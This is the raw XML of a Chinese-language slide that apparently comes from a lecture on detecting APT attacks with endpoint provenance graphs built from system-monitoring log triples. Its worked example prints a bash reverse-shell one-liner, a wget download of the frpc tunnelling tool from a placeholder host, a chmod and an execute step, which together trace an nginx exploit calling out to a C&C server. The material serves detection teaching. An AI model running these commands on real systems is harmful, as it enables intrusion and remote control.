          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4198620"/>
            <a:ext cx="3972560" cy="918845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="5348605"/>
            <a:ext cx="4123690" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>每条系统监控日志可以抽象为三元组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;Subject Entity, Operation, Object Entity&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF939B10-C4B5-4C21-A717-DC655D66ECCE}"/>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终端数据组织形式</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终端溯源图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="124142" y="2114641"/>
            <a:ext cx="11943715" cy="932180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>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b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>终端</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>溯源图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击示例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a: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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击者通过恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务漏洞，下载和执行恶意文件，外联远程命令与控制（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C&amp;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）服务器。</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n>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>菱形表示网络对象，椭圆表示文件对象，长方形表示进程对象。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>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sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="菱形 60"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4201795" y="4148455"/>
            <a:ext cx="782320" cy="216535"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>x.x.x.x:80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="62" name="曲线连接符 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="1"/>
            <a:endCxn id="64" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4984115" y="4251960"/>
            <a:ext cx="1463040" cy="5080"/>
          </a:xfrm>
          <a:prstGeom prst="curved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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6447155" y="4144010"/>
            <a:ext cx="514985" cy="215900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>nginx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="曲线连接符 2"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4958080" y="4797425"/>
            <a:ext cx="1487170" cy="5715"/>
          </a:xfrm>
          <a:prstGeom prst="curved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6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6445250" y="4695825"/>
            <a:ext cx="514985" cy="213995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="曲线连接符 70"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="64" idx="2"/>
            <a:endCxn id="4" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6536055" y="4536440"/>
            <a:ext cx="335915" cy="1905"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50095"/>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5" name="椭圆 274"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6380480" y="5182235"/>
            <a:ext cx="635635" cy="225425"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/frpc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="276" name="曲线连接符 275"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="275" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6564630" y="5053330"/>
            <a:ext cx="272415" cy="4445"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5011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菱形 27"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4175760" y="4684395"/>
            <a:ext cx="782320" cy="225425"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>x.x.x.x:80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="文本框 159"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4792345" y="3888105"/>
            <a:ext cx="1746250" cy="400110"/>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1: connect and exploit (bash -i &gt;&amp; /tcp/x.x.x.x/1234 0&gt;&amp;1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="矩形 36"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356735" y="5166360"/>
            <a:ext cx="514985" cy="213995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>frpc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="菱形 38"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5335270" y="5166360"/>
            <a:ext cx="782320" cy="225425"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>x.x.x.x:2331</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="曲线连接符 39"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="37" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5530533" y="4003358"/>
            <a:ext cx="256540" cy="2088515"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49876"/>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p:cNvCxnSpPr>
            <a:stCxn id="37" idx="3"/>
            <a:endCxn id="39" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId15"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871720" y="5283200"/>
            <a:ext cx="463550" cy="5715"/>
          </a:xfrm>
          <a:prstGeom prst="curved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16"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5045075" y="4440555"/>
            <a:ext cx="1729105" cy="398780"/>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3: connect and download (wget x.x.x.x/frpc)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="文本框 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId17"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165850" y="4829175"/>
            <a:ext cx="1041400" cy="400110"/>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4: create (chmod 777 frpc)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4281805" y="4845685"/>
            <a:ext cx="1889760" cy="246221"/>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5: execute (./frpc -t xxxx -p 2331)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="文本框 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId19"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4814570" y="5065395"/>
            <a:ext cx="738505" cy="246221"/>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6: connect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="矩形 74"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId20"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4127500" y="3915410"/>
            <a:ext cx="3016885" cy="1522730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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1200">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="文本框 82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId21"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6504940" y="4441190"/>
            <a:ext cx="789940" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2: execute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="文本框 72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId22"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1586230" y="5495290"/>
            <a:ext cx="2400935" cy="275590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>原始系统监控日志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="文本框 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId23"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850265" y="3800475"/>
            <a:ext cx="2917190" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统监控日志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进程，操作，行为属性</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1.&lt;nginx, connect and exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>bash -i &gt;&amp; /tcp/x.x.x.x/1234 0&gt;&amp;1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </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2.&lt;nginx, execute, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>bash</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3.&lt;bash, connet and download, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
